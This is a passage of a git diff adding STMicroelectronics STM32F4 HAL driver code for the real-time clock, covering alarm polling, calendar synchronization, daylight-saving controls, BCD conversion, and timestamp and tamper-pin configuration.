to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval None + */ +__weak void HAL_RTC_AlarmAEventCallback(RTC_HandleTypeDef *hrtc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hrtc); + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_RTC_AlarmAEventCallback could be implemented in the user file + */ +} + +/** + * @brief This function handles AlarmA Polling request. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTC_PollForAlarmAEvent(RTC_HandleTypeDef *hrtc, uint32_t Timeout) +{ + uint32_t tickstart = 0U; + + /* Get tick */ + tickstart = HAL_GetTick(); + + while(__HAL_RTC_ALARM_GET_FLAG(hrtc, RTC_FLAG_ALRAF) == RESET) + { + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - tickstart ) > Timeout)) + { + hrtc->State = HAL_RTC_STATE_TIMEOUT; + return HAL_TIMEOUT; + } + } + } + + /* Clear the Alarm interrupt pending bit */ + __HAL_RTC_ALARM_CLEAR_FLAG(hrtc, RTC_FLAG_ALRAF); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup RTC_Exported_Functions_Group4 Peripheral Control functions + * @brief Peripheral Control functions + * +@verbatim + =============================================================================== + ##### Peripheral Control functions ##### + =============================================================================== + [..] + This subsection provides functions allowing to + (+) Wait for RTC Time and Date Synchronization + +@endverbatim + * @{ + */ + +/** + * @brief Waits until the RTC Time and Date registers (RTC_TR and RTC_DR) are + * synchronized with RTC APB clock. + * @note The RTC Resynchronization mode is write protected, use the + * __HAL_RTC_WRITEPROTECTION_DISABLE() before calling this function. + * @note To read the calendar through the shadow registers after Calendar + * initialization, calendar update or after wake-up from low power modes + * the software must first clear the RSF flag. + * The software must then wait until it is set again before reading + * the calendar, which means that the calendar registers have been + * correctly copied into the RTC_TR and RTC_DR shadow registers. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTC_WaitForSynchro(RTC_HandleTypeDef* hrtc) +{ + uint32_t tickstart = 0U; + + /* Clear RSF flag */ + hrtc->Instance->ISR &= (uint32_t)RTC_RSF_MASK; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait the registers to be synchronised */ + while((hrtc->Instance->ISR & RTC_ISR_RSF) == (uint32_t)RESET) + { + if((HAL_GetTick() - tickstart ) > RTC_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup RTC_Exported_Functions_Group5 Peripheral State functions + * @brief Peripheral State functions + * +@verbatim + =============================================================================== + ##### Peripheral State functions ##### + =============================================================================== + [..] + This subsection provides functions allowing to + (+) Get RTC state + +@endverbatim + * @{ + */ +/** + * @brief Returns the RTC state. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval HAL state + */ +HAL_RTCStateTypeDef HAL_RTC_GetState(RTC_HandleTypeDef* hrtc) +{ + return hrtc->State; +} + +/** + * @brief Daylight Saving Time, Add one hour to the calendar in one single operation + * without going through the initialization procedure. + * @param hrtc RTC handle + * @retval None + */ +void HAL_RTC_DST_Add1Hour(RTC_HandleTypeDef *hrtc) +{ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + SET_BIT(hrtc->Instance->CR, RTC_CR_ADD1H); + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); +} + +/** + * @brief Daylight Saving Time, Substract one hour from the calendar in one + * single operation without going through the initialization procedure. + * @param hrtc RTC handle + * @retval None + */ +void HAL_RTC_DST_Sub1Hour(RTC_HandleTypeDef *hrtc) +{ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + SET_BIT(hrtc->Instance->CR, RTC_CR_SUB1H); + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); +} + +/** + * @brief Daylight Saving Time, Set the store operation bit. + * @note It can be used by the software in order to memorize the DST status. + * @param hrtc RTC handle + * @retval None + */ +void HAL_RTC_DST_SetStoreOperation(RTC_HandleTypeDef *hrtc) +{ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + SET_BIT(hrtc->Instance->CR, RTC_CR_BKP); + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); +} + +/** + * @brief Daylight Saving Time, Clear the store operation bit. + * @param hrtc RTC handle + * @retval None + */ +void HAL_RTC_DST_ClearStoreOperation(RTC_HandleTypeDef *hrtc) +{ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + CLEAR_BIT(hrtc->Instance->CR, RTC_CR_BKP); + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); +} + +/** + * @brief Daylight Saving Time, Read the store operation bit. + * @param hrtc RTC handle + * @retval operation see RTC_StoreOperation_Definitions + */ +uint32_t HAL_RTC_DST_ReadStoreOperation(RTC_HandleTypeDef *hrtc) +{ + return READ_BIT(hrtc->Instance->CR, RTC_CR_BKP); +} + +/** + * @} + */ + +/** + * @brief Enters the RTC Initialization mode. + * @note The RTC Initialization mode is write protected, use the + * __HAL_RTC_WRITEPROTECTION_DISABLE() before calling this function. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval HAL status + */ +HAL_StatusTypeDef RTC_EnterInitMode(RTC_HandleTypeDef* hrtc) +{ + uint32_t tickstart = 0U; + + /* Check if the Initialization mode is set */ + if((hrtc->Instance->ISR & RTC_ISR_INITF) == (uint32_t)RESET) + { + /* Set the Initialization mode */ + hrtc->Instance->ISR = (uint32_t)RTC_INIT_MASK; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait till RTC is in INIT state and if Time out is reached exit */ + while((hrtc->Instance->ISR & RTC_ISR_INITF) == (uint32_t)RESET) + { + if((HAL_GetTick() - tickstart ) > RTC_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + + return HAL_OK; +} + + +/** + * @brief Converts a 2 digit decimal to BCD format. + * @param Value Byte to be converted + * @retval Converted byte + */ +uint8_t RTC_ByteToBcd2(uint8_t Value) +{ + uint32_t bcdhigh = 0U; + + while(Value >= 10U) + { + bcdhigh++; + Value -= 10U; + } + + return ((uint8_t)(bcdhigh << 4U) | Value); +} + +/** + * @brief Converts from 2 digit BCD to Binary. + * @param Value BCD value to be converted + * @retval Converted word + */ +uint8_t RTC_Bcd2ToByte(uint8_t Value) +{ + uint32_t tmp = 0U; + tmp = ((uint8_t)(Value & (uint8_t)0xF0) >> (uint8_t)0x4) * 10; + return (tmp + (Value & (uint8_t)0x0F)); +} + +/** + * @} + */ + +#endif /* HAL_RTC_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_rtc_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_rtc_ex.c new file mode 100644 index 000000000..8e07b4e22 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_rtc_ex.c @@ -0,0 +1,1784 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_rtc_ex.c + * @author MCD Application Team + * @brief RTC HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Real Time Clock (RTC) Extension peripheral: + * + RTC Time Stamp functions + * + RTC Tamper functions + * + RTC Wake-up functions + * + Extension Control functions + * + Extension RTC features functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + (+) Enable the RTC domain access. + (+) Configure the RTC Prescaler (Asynchronous and Synchronous) and RTC hour + format using the HAL_RTC_Init() function. + + *** RTC Wake-up configuration *** + ================================ + [..] + (+) To configure the RTC Wake-up Clock source and Counter use the HAL_RTCEx_SetWakeUpTimer() + function. You can also configure the RTC Wake-up timer in interrupt mode + using the HAL_RTCEx_SetWakeUpTimer_IT() function. + (+) To read the RTC Wake-up Counter register, use the HAL_RTCEx_GetWakeUpTimer() + function. + + *** TimeStamp configuration *** + =============================== + [..] + (+) Configure the RTC_AFx trigger and enable the RTC TimeStamp using the + HAL_RTCEx_SetTimeStamp() function. You can also configure the RTC TimeStamp with + interrupt mode using the HAL_RTCEx_SetTimeStamp_IT() function. + (+) To read the RTC TimeStamp Time and Date register, use the HAL_RTCEx_GetTimeStamp() + function. + (+) The TIMESTAMP alternate function can be mapped either to RTC_AF1 (PC13) + or RTC_AF2 (PI8 or PA0 only for STM32F446xx devices) depending on the value of TSINSEL bit in + RTC_TAFCR register. The corresponding pin is also selected by HAL_RTCEx_SetTimeStamp() + or HAL_RTCEx_SetTimeStamp_IT() function. + + *** Tamper configuration *** + ============================ + [..] + (+) Enable the RTC Tamper and configure the Tamper filter count, trigger Edge + or Level according to the Tamper filter (if equal to 0 Edge else Level) + value, sampling frequency, precharge or discharge and Pull-UP using the + HAL_RTCEx_SetTamper() function. You can configure RTC Tamper in interrupt + mode using HAL_RTCEx_SetTamper_IT() function. + (+) The TAMPER1 alternate function can be mapped either to RTC_AF1 (PC13) + or RTC_AF2 (PI8 or PA0 only for STM32F446xx devices) depending on the value of TAMP1INSEL bit in + RTC_TAFCR register. The corresponding pin is also selected by HAL_RTCEx_SetTamper() + or HAL_RTCEx_SetTamper_IT() function. + + *** Backup Data Registers configuration *** + =========================================== + [..] + (+) To write to the RTC Backup Data registers, use the HAL_RTCEx_BKUPWrite() + function. + (+) To read the RTC Backup Data registers, use the HAL_RTCEx_BKUPRead() + function. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup RTCEx RTCEx + * @brief RTC HAL module driver + * @{ + */ + +#ifdef HAL_RTC_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ + +/** @defgroup RTCEx_Exported_Functions RTCEx Exported Functions + * @{ + */ + +/** @defgroup RTCEx_Exported_Functions_Group1 RTC TimeStamp and Tamper functions + * @brief RTC TimeStamp and Tamper functions + * +@verbatim + =============================================================================== + ##### RTC TimeStamp and Tamper functions ##### + =============================================================================== + + [..] This section provides functions allowing to configure TimeStamp feature + +@endverbatim + * @{ + */ + +/** + * @brief Sets TimeStamp. + * @note This API must be called before enabling the TimeStamp feature. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param TimeStampEdge Specifies the pin edge on which the TimeStamp is + * activated. + * This parameter can be one of the following values: + * @arg RTC_TIMESTAMPEDGE_RISING: the Time stamp event occurs on the + * rising edge of the related pin. + * @arg RTC_TIMESTAMPEDGE_FALLING: the Time stamp event occurs on the + * falling edge of the related pin. + * @param RTC_TimeStampPin specifies the RTC TimeStamp Pin. + * This parameter can be one of the following values: + * @arg RTC_TIMESTAMPPIN_DEFAULT: PC13 is selected as RTC TimeStamp Pin. + * @arg RTC_TIMESTAMPPIN_POS1: PI8/PA0 is selected as RTC TimeStamp Pin. + * (not applicable in the case of STM32F412xx, STM32F413xx and STM32F423xx devices) + * (PI8 for all STM32 devices except for STM32F446xx devices the PA0 is used) + * @arg RTC_TIMESTAMPPIN_PA0: PA0 is selected as RTC TimeStamp Pin only for STM32F446xx devices + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_SetTimeStamp(RTC_HandleTypeDef *hrtc, uint32_t TimeStampEdge, uint32_t RTC_TimeStampPin) +{ + uint32_t tmpreg = 0U; + + /* Check the parameters */ + assert_param(IS_TIMESTAMP_EDGE(TimeStampEdge)); + assert_param(IS_RTC_TIMESTAMP_PIN(RTC_TimeStampPin)); + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Get the RTC_CR register and clear the bits to be configured */ + tmpreg = (uint32_t)(hrtc->Instance->CR & (uint32_t)~(RTC_CR_TSEDGE | RTC_CR_TSE)); + + tmpreg|= TimeStampEdge; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + hrtc->Instance->TAFCR &= (uint32_t)~RTC_TAFCR_TSINSEL; + hrtc->Instance->TAFCR |= (uint32_t)(RTC_TimeStampPin); + + /* Configure the Time Stamp TSEDGE and Enable bits */ + hrtc->Instance->CR = (uint32_t)tmpreg; + + __HAL_RTC_TIMESTAMP_ENABLE(hrtc); + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Sets TimeStamp with Interrupt. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @note This API must be called before enabling the TimeStamp feature. + * @param TimeStampEdge Specifies the pin edge on which the TimeStamp is + * activated. + * This parameter can be one of the following values: + * @arg RTC_TIMESTAMPEDGE_RISING: the Time stamp event occurs on the + * rising edge of the related pin. + * @arg RTC_TIMESTAMPEDGE_FALLING: the Time stamp event occurs on the + * falling edge of the related pin. + * @param RTC_TimeStampPin Specifies the RTC TimeStamp Pin. + * This parameter can be one of the following values: + * @arg RTC_TIMESTAMPPIN_DEFAULT: PC13 is selected as RTC TimeStamp Pin. + * @arg RTC_TIMESTAMPPIN_PI8: PI8 is selected as RTC TimeStamp Pin. (not applicable in the case of STM32F446xx, STM32F412xx, STM32F413xx and STM32F423xx devices) + * @arg RTC_TIMESTAMPPIN_PA0: PA0 is selected as RTC TimeStamp Pin only for STM32F446xx devices + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_SetTimeStamp_IT(RTC_HandleTypeDef *hrtc, uint32_t TimeStampEdge, uint32_t RTC_TimeStampPin) +{ + uint32_t tmpreg = 0U; + + /* Check the parameters */ + assert_param(IS_TIMESTAMP_EDGE(TimeStampEdge)); + assert_param(IS_RTC_TIMESTAMP_PIN(RTC_TimeStampPin)); + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Get the RTC_CR register and clear the bits to be configured */ + tmpreg = (uint32_t)(hrtc->Instance->CR & (uint32_t)~(RTC_CR_TSEDGE | RTC_CR_TSE)); + + tmpreg |= TimeStampEdge; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Configure the Time Stamp TSEDGE and Enable bits */ + hrtc->Instance->CR = (uint32_t)tmpreg; + + hrtc->Instance->TAFCR &= (uint32_t)~RTC_TAFCR_TSINSEL; + hrtc->Instance->TAFCR |= (uint32_t)(RTC_TimeStampPin); + + /* Clear RTC Timestamp flag */ + __HAL_RTC_TIMESTAMP_CLEAR_FLAG(hrtc, RTC_FLAG_TSF); + + __HAL_RTC_TIMESTAMP_ENABLE(hrtc); + + /* Enable IT timestamp */ + __HAL_RTC_TIMESTAMP_ENABLE_IT(hrtc,RTC_IT_TS); + + /* RTC timestamp Interrupt Configuration: EXTI configuration */ + __HAL_RTC_TAMPER_TIMESTAMP_EXTI_ENABLE_IT(); + + EXTI->RTSR |= RTC_EXTI_LINE_TAMPER_TIMESTAMP_EVENT; + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Deactivates TimeStamp. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_DeactivateTimeStamp(RTC_HandleTypeDef *hrtc) +{ + uint32_t tmpreg = 0U; + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* In case of interrupt mode is used, the interrupt source must disabled */ + __HAL_RTC_TIMESTAMP_DISABLE_IT(hrtc, RTC_IT_TS); + + /* Get the RTC_CR register and clear the bits to be configured */ + tmpreg = (uint32_t)(hrtc->Instance->CR & (uint32_t)~(RTC_CR_TSEDGE | RTC_CR_TSE)); + + /* Configure the Time Stamp TSEDGE and Enable bits */ + hrtc->Instance->CR = (uint32_t)tmpreg; + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Gets the RTC TimeStamp value. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param sTimeStamp Pointer to Time structure + * @param sTimeStampDate Pointer to Date structure + * @param Format specifies the format of the entered parameters. + * This parameter can be one of the following values: + * RTC_FORMAT_BIN: Binary data format + * RTC_FORMAT_BCD: BCD data format + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_GetTimeStamp(RTC_HandleTypeDef *hrtc, RTC_TimeTypeDef* sTimeStamp, RTC_DateTypeDef* sTimeStampDate, uint32_t Format) +{ + uint32_t tmptime = 0U, tmpdate = 0U; + + /* Check the parameters */ + assert_param(IS_RTC_FORMAT(Format)); + + /* Get the TimeStamp time and date registers values */ + tmptime = (uint32_t)(hrtc->Instance->TSTR & RTC_TR_RESERVED_MASK); + tmpdate = (uint32_t)(hrtc->Instance->TSDR & RTC_DR_RESERVED_MASK); + + /* Fill the Time structure fields with the read parameters */ + sTimeStamp->Hours = (uint8_t)((tmptime & (RTC_TR_HT | RTC_TR_HU)) >> 16U); + sTimeStamp->Minutes = (uint8_t)((tmptime & (RTC_TR_MNT | RTC_TR_MNU)) >> 8U); + sTimeStamp->Seconds = (uint8_t)(tmptime & (RTC_TR_ST | RTC_TR_SU)); + sTimeStamp->TimeFormat = (uint8_t)((tmptime & (RTC_TR_PM)) >> 16U); + sTimeStamp->SubSeconds = (uint32_t) hrtc->Instance->TSSSR; + + /* Fill the Date structure fields with the read parameters */ + sTimeStampDate->Year = 0U; + sTimeStampDate->Month = (uint8_t)((tmpdate & (RTC_DR_MT | RTC_DR_MU)) >> 8U); + sTimeStampDate->Date = (uint8_t)(tmpdate & (RTC_DR_DT | RTC_DR_DU)); + sTimeStampDate->WeekDay = (uint8_t)((tmpdate & (RTC_DR_WDU)) >> 13U); + + /* Check the input parameters format */ + if(Format == RTC_FORMAT_BIN) + { + /* Convert the TimeStamp structure parameters to Binary format */ + sTimeStamp->Hours = (uint8_t)RTC_Bcd2ToByte(sTimeStamp->Hours); + sTimeStamp->Minutes = (uint8_t)RTC_Bcd2ToByte(sTimeStamp->Minutes); + sTimeStamp->Seconds = (uint8_t)RTC_Bcd2ToByte(sTimeStamp->Seconds); + + /* Convert the DateTimeStamp structure parameters to Binary format */ + sTimeStampDate->Month = (uint8_t)RTC_Bcd2ToByte(sTimeStampDate->Month); + sTimeStampDate->Date = (uint8_t)RTC_Bcd2ToByte(sTimeStampDate->Date); + sTimeStampDate->WeekDay = (uint8_t)RTC_Bcd2ToByte(sTimeStampDate->WeekDay); + } + + /* Clear the TIMESTAMP Flag */ + __HAL_RTC_TIMESTAMP_CLEAR_FLAG(hrtc, RTC_FLAG_TSF); + + return HAL_OK; +} + +/** + * @brief Sets Tamper + * @note By calling this API we disable the tamper interrupt for all tampers. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param sTamper Pointer to Tamper Structure. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_SetTamper(RTC_HandleTypeDef *hrtc, RTC_TamperTypeDef* sTamper) +{ + uint32_t tmpreg = 0U; + + /* Check the parameters */ + assert_param(IS_RTC_TAMPER(sTamper->Tamper)); + assert_param(IS_RTC_TAMPER_PIN(sTamper->PinSelection)); + assert_param(IS_RTC_TAMPER_TRIGGER(sTamper->Trigger)); + assert_param(IS_RTC_TAMPER_FILTER(sTamper->Filter)); + assert_param(IS_RTC_TAMPER_SAMPLING_FREQ(sTamper->SamplingFrequency)); + assert_param(IS_RTC_TAMPER_PRECHARGE_DURATION(sTamper->PrechargeDuration)); + assert_param(IS_RTC_TAMPER_PULLUP_STATE(sTamper->TamperPullUp)); + assert_param(IS_RTC_TAMPER_TIMESTAMPONTAMPER_DETECTION(sTamper->TimeStampOnTamperDetection)); + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + if(sTamper->Trigger != RTC_TAMPERTRIGGER_RISINGEDGE) + { + sTamper->Trigger = (uint32_t)(sTamper->Tamper << 1U); + } + + tmpreg = ((uint32_t)sTamper->Tamper | (uint32_t)sTamper->PinSelection | (uint32_t)sTamper->Trigger |\ + (uint32_t)sTamper->Filter | (uint32_t)sTamper->SamplingFrequency | (uint32_t)sTamper->PrechargeDuration |\ + (uint32_t)sTamper->TamperPullUp | sTamper->TimeStampOnTamperDetection); + + hrtc->Instance->TAFCR &= (uint32_t)~((uint32_t)sTamper->Tamper | (uint32_t)(sTamper->Tamper << 1U) | (uint32_t)RTC_TAFCR_TAMPTS |\ + (uint32_t)RTC_TAFCR_TAMPFREQ | (uint32_t)RTC_TAFCR_TAMPFLT | (uint32_t)RTC_TAFCR_TAMPPRCH |\ + (uint32_t)RTC_TAFCR_TAMPPUDIS | (uint32_t)RTC_TAFCR_TAMPINSEL | (uint32_t)RTC_TAFCR_TAMPIE); + + hrtc->Instance->TAFCR |= tmpreg; + + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Sets Tamper with interrupt. + * @note By calling this API we force the tamper interrupt for all tampers. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param sTamper Pointer to RTC Tamper. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_SetTamper_IT(RTC_HandleTypeDef *hrtc, RTC_TamperTypeDef* sTamper) +{ + uint32_t tmpreg = 0U; + + /* Check the parameters */ + assert_param(IS_RTC_TAMPER(sTamper->Tamper)); + assert_param(IS_RTC_TAMPER_PIN(sTamper->PinSelection)); + assert_param(IS_RTC_TAMPER_TRIGGER(sTamper->Trigger)); + assert_param(IS_RTC_TAMPER_FILTER(sTamper->Filter)); + assert_param(IS_RTC_TAMPER_SAMPLING_FREQ(sTamper->SamplingFrequency)); + assert_param(IS_RTC_TAMPER_PRECHARGE_DURATION(sTamper->PrechargeDuration)); + assert_param(IS_RTC_TAMPER_PULLUP_STATE(sTamper->TamperPullUp)); + assert_param(IS_RTC_TAMPER_TIMESTAMPONTAMPER_DETECTION(sTamper->TimeStampOnTamperDetection)); + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Configure the tamper trigger */ + if(sTamper->Trigger != RTC_TAMPERTRIGGER_RISINGEDGE) + { + sTamper->Trigger = (uint32_t)(sTamper->Tamper << 1U); + } + + tmpreg = ((uint32_t)sTamper->Tamper | (uint32_t)sTamper->PinSelection | (uint32_t)sTamper->Trigger |\ + (uint32_t)sTamper->Filter | (uint32_t)sTamper->SamplingFrequency | (uint32_t)sTamper->PrechargeDuration |\ + (uint32_t)sTamper->TamperPullUp | sTamper->TimeStampOnTamperDetection); + + hrtc->Instance->TAFCR &= (uint32_t)~((uint32_t)sTamper->Tamper | (uint32_t)(sTamper->Tamper << 1U) | (uint32_t)RTC_TAFCR_TAMPTS |\ + (uint32_t)RTC_TAFCR_TAMPFREQ | (uint32_t)RTC_TAFCR_TAMPFLT | (uint32_t)RTC_TAFCR_TAMPPRCH |\ + (uint32_t)RTC_TAFCR_TAMPPUDIS | (uint32_t)RTC_TAFCR_TAMPINSEL); + + hrtc->Instance->TAFCR |= tmpreg; + + /* Configure the Tamper Interrupt in the RTC_TAFCR */ + hrtc->Instance->TAFCR |= (uint32_t)RTC_TAFCR_TAMPIE; + + if(sTamper->Tamper == RTC_TAMPER_1) + { + /* Clear RTC Tamper 1 flag */ + __HAL_RTC_TAMPER_CLEAR_FLAG(hrtc, RTC_FLAG_TAMP1F); + } + else + { + /* Clear RTC Tamper 2 flag */ + __HAL_RTC_TAMPER_CLEAR_FLAG(hrtc, RTC_FLAG_TAMP2F); + } + + /* RTC Tamper Interrupt Configuration: EXTI configuration */ + __HAL_RTC_TAMPER_TIMESTAMP_EXTI_ENABLE_IT(); + + EXTI->RTSR |= RTC_EXTI_LINE_TAMPER_TIMESTAMP_EVENT; + + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Deactivates Tamper. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param Tamper Selected tamper pin. + * This parameter can be RTC_Tamper_1 and/or RTC_TAMPER_2. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTCEx_DeactivateTamper(RTC_HandleTypeDef *hrtc, uint32_t Tamper) +{ + assert_param(IS_RTC_TAMPER(Tamper)); + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the selected Tamper pin */ + hrtc->Instance->TAFCR &= (uint32_t)~Tamper; + + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief This function handles TimeStamp interrupt request. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval None + */ +void HAL_RTCEx_TamperTimeStampIRQHandler(RTC_HandleTypeDef *hrtc) +{ + /* Get the TimeStamp interrupt source enable status */ + if(__HAL_RTC_TIMESTAMP_GET_IT_SOURCE(hrtc, RTC_IT_TS) != (uint32_t)RESET) + { + /* Get the pending status of the TIMESTAMP Interrupt */ + if(__HAL_RTC_TIMESTAMP_GET_FLAG(hrtc, RTC_FLAG_TSF) != (uint32_t)RESET) + { + /* TIMESTAMP callback */ +#if (USE_HAL_RTC_REGISTER_CALLBACKS == 1) + hrtc->TimeStampEventCallback(hrtc); +#else + HAL_RTCEx_TimeStampEventCallback(hrtc); +#endif /* USE_HAL_RTC_REGISTER_CALLBACKS */ + + /* Clear the TIMESTAMP interrupt pending bit */ + __HAL_RTC_TIMESTAMP_CLEAR_FLAG(hrtc,RTC_FLAG_TSF); + } + } + + /* Get the Tamper1 interrupt source enable status */ + if(__HAL_RTC_TAMPER_GET_IT_SOURCE(hrtc, RTC_IT_TAMP) != (uint32_t)RESET) + { + /* Get the pending status of the Tamper1 Interrupt */ + if(__HAL_RTC_TAMPER_GET_FLAG(hrtc, RTC_FLAG_TAMP1F) != (uint32_t)RESET) + { + /* Tamper callback */ +#if (USE_HAL_RTC_REGISTER_CALLBACKS == 1) + hrtc->Tamper1EventCallback(hrtc); +#else + HAL_RTCEx_Tamper1EventCallback(hrtc); +#endif /* USE_HAL_RTC_REGISTER_CALLBACKS */ + + /* Clear the Tamper interrupt pending bit */ + __HAL_RTC_TAMPER_CLEAR_FLAG(hrtc,RTC_FLAG_TAMP1F); + } + } + + /* Get the Tamper2 interrupt source enable status */ + if(__HAL_RTC_TAMPER_GET_IT_SOURCE(hrtc, RTC_IT_TAMP) != (uint32_t)RESET) + { + /* Get the pending status of the Tamper2 Interrupt */ + if(__HAL_RTC_TAMPER_GET_FLAG(hrtc, RTC_FLAG_TAMP2F) != (uint32_t)RESET) + { + /* Tamper callback */ +#if (USE_HAL_RTC_REGISTER_CALLBACKS == 1) + hrtc->Tamper2EventCallback(hrtc); +#else + HAL_RTCEx_Tamper2EventCallback(hrtc); +#endif /* USE_HAL_RTC_REGISTER_CALLBACKS */ + + /* Clear the Tamper interrupt pending bit */ + __HAL_RTC_TAMPER_CLEAR_FLAG(hrtc, RTC_FLAG_TAMP2F); + } + } + + /* Clear the EXTI's Flag for RTC TimeStamp and Tamper */ + __HAL_RTC_TAMPER_TIMESTAMP_EXTI_CLEAR_FLAG(); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; +} + +/** + * @brief TimeStamp callback. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval None + */ +__weak void HAL_RTCEx_TimeStampEventCallback(RTC_HandleTypeDef *hrtc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hrtc); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_RTC_TimeStampEventCallback could be implemented in the user file + */ +} + +/** + * @brief Tamper 1 callback. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval None + */ +__weak void HAL_RTCEx_Tamper1EventCallback(RTC_HandleTypeDef *hrtc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hrtc); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_RTC_Tamper1EventCallback could be implemented in the user file + */ +} + +/** + * @brief Tamper 